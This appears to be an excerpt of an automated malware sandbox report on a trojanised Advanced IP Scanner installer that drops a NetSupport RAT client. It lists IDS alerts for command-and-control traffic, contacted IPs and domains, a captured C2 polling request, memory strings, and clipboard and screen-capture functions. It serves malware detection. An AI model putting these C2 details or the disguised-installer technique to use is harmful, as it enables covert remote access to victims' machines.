                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11064E30 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,8_2_11064E30

                                  Networking

                                  barindex
                                  Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49739 -> 151.236.16.15:443
                                  Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.4:49740 -> 199.188.200.195:443
                                  Source: Yara matchFile source: amsi32_7132.amsi.csv, type: OTHER
                                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\is-UILLF.tmp\cispn.ps1, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\Advanced IP Scanner\unins000.dat, type: DROPPED
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: Joe Sandbox ViewIP Address: 104.26.1.231 104.26.1.231
                                  Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
                                  Source: Joe Sandbox ViewASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
                                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.4:49733
                                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.4:49758
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                  Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                  Source: global trafficDNS traffic detected: DNS query: payiki.com
                                  Source: global trafficDNS traffic detected: DNS query: anyhowdo.com
                                  Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                  Source: unknownHTTP traffic detected: POST http://151.236.16.15/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 151.236.16.15Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                  Source: client32.exe, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/fakeurl.htm
                                  Source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/testpage.htm
                                  Source: powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: http://%s/testpage.htmwininet.dll
                                  Source: client32.exe, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://127.0.0.1
                                  Source: client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                  Source: powershell.exe, 00000005.00000002.2176938305.0000000007540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microx
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                                  Source: client32.exe, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                  Source: client32.exe, 00000007.00000003.2067260818.00000000004E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp$k
                                  Source: client32.exe, 00000007.00000002.3639491690.00000000030EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp2
                                  Source: client32.exe, 00000007.00000002.3638542031.000000000049A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp5X
                                  Source: client32.exe, 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2160969972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249132975.000000001118F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                  Source: client32.exe, 00000007.00000002.3639491690.00000000030EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspj
                                  Source: powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drString found in binary or memory: http://ocsp.comodoca.com0
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drString found in binary or memory: http://ocsp.sectigo.com0
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: http://s.symcb.com/pca3-g5.crl0
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: http://s.symcb.com/universal-root.crl0
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: http://s.symcd.com06
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: http://s.symcd.com0_
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                  Source: powershell.exe, 00000005.00000002.2134480626.00000000049C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0a
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: http://sw.symcb.com/sw.crl0
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: http://sw.symcd.com0
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: http://sw1.symcb.com/sw.crt0
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: http://www.advanced-ip-scanner.com0
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.macrovision.com0
                                  Source: client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
                                  Source: client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.netsupportsoftware.com
                                  Source: client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.pci.co.uk/support
                                  Source: client32.exe, 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.2161014488.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, client32.exe, 0000000A.00000002.2249175114.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpString found in binary or memory: http://www.pci.co.uk/supportsupport
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.radmin.com
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2257970468.0000000002DE4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ultimatenetworktool.com
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2257970468.0000000002DF3000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2249168820.0000000002DFA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ultimatenetworktool.com/support
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.2257970468.0000000002DF3000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2249168820.0000000002DFA000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ultimatenetworktool.com/update
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2249168820.0000000002DEC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.ultimatenetworktool.com1
                                  Source: powershell.exe, 00000005.00000002.2134480626.00000000049C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                  Source: powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                  Source: powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                  Source: powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.000000000500B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: https://d.symcb.com/cps0%
                                  Source: is-R93D4.tmp.1.drString found in binary or memory: https://d.symcb.com/rpa0
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000002.2253546565.0000000000D9C000.00000004.00000010.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: https://d.symcb.com/rpa0)
                                  Source: Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000003.2235000642.0000000005DA4000.00000004.00001000.00020000.00000000.sdmp, is-R93D4.tmp.1.drString found in binary or memory: https://d.symcb.com/rpa0.
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                                  Source: powershell.exe, 00000005.00000002.2146961132.0000000006426000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drString found in binary or memory: https://sectigo.com/CPS0
                                  Source: powershell.exe, 00000005.00000002.2134480626.0000000004F0B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2134480626.0000000004E6F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.5.drString found in binary or memory: https://sectigo.com/CPS0D
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1793005719.000000007EB0B000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1792633341.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000000.1794346897.0000000000501000.00000020.00000001.01000000.00000004.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp.0.drString found in binary or memory: https://www.innosetup.com/
                                  Source: Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1793005719.000000007EB0B000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.exe, 00000000.00000003.1792633341.00000000033D0000.00000004.00001000.00020000.00000000.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp, 00000001.00000000.1794346897.0000000000501000.00000020.00000001.01000000.00000004.sdmp, Advanced_IP_Scanner_2.5.4594.12.tmp.0.drString found in binary or memory: https://www.remobjects.com/ps
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,7_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,7_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11032930 GetClipboardFormatNameA,SetClipboardData,7_2_11032930
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_1101F360 OpenClipboard,GlobalAlloc,GlobalLock,_memmove,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,MessageBeep,CloseClipboard,8_2_1101F360
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 8_2_11032930 GetClipboardFormatNameA,SetClipboardData,8_2_11032930
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11031AC0 IsClipboardFormatAvailable,GetClipboardData,GlobalSize,GlobalLock,_memmove,GlobalUnlock,7_2_11031AC0
                                  Source: C:\Users\user\AppData\Roaming\SysHelper\client32.exeCode function: 7_2_11007720 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,7_2_11007720
                                  Source: Yara matchFile source: 8.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.111b3308.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 10.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
